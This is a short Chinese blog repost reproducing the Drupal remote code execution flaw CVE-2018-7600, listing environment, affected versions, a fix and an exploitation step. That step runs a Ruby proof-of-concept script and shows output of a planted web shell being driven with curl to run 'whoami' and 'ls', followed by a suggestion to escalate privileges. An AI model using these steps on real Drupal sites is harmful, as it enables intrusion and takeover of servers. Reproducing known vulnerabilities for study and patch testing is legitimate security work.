drupal CVE-2018-7600 复现

时间：2018-05-12 00:36:55 阅读：497 评论：0 收藏：0 [点我收藏+]

1.系统环境

Drupal 7.5
linux 主机
ruby 代码

2.原理说明

Drupal 6.x，7.x，8.x

参考：CVE-2018-7600漏洞分析

3.利用

在Python2.7 环境下运行poc即可验证

或者在Linux下安装ruby环境并且运行 CVE-2018-7600.rb文件

ruby CVE-2017-7600.rb 
ruby CVE-2018-7600.rb http://127.0.0.1:8089/drupal-8.5.0/
[*] Fake shell:   curl ‘http://47.98.122.11:8089/drupal-8.5.0/s.php‘ -d ‘c=whoami‘
[*] Fake shell:   curl ‘http://47.98.122.11:8089/drupal-8.5.0/s.php‘ -d ‘c=ls‘

最后可以查找系统漏洞进行提权

4.修复

主要支持版本推荐更新到Drupal相应的最新子版本

参考 drupal官网

drupal CVE-2018-7600 复现

原文：https://www.cnblogs.com/Rightsec/p/9027145.html

踩

(0)

评论一句话评论（0）

分享档案

更多>

2021年09月23日 (328)
2021年09月24日 (313)
2021年09月17日 (191)
2021年09月15日 (369)
2021年09月16日 (411)
2021年09月13日 (439)
2021年09月11日 (398)
2021年09月12日 (393)
2021年09月10日 (160)
2021年09月08日 (222)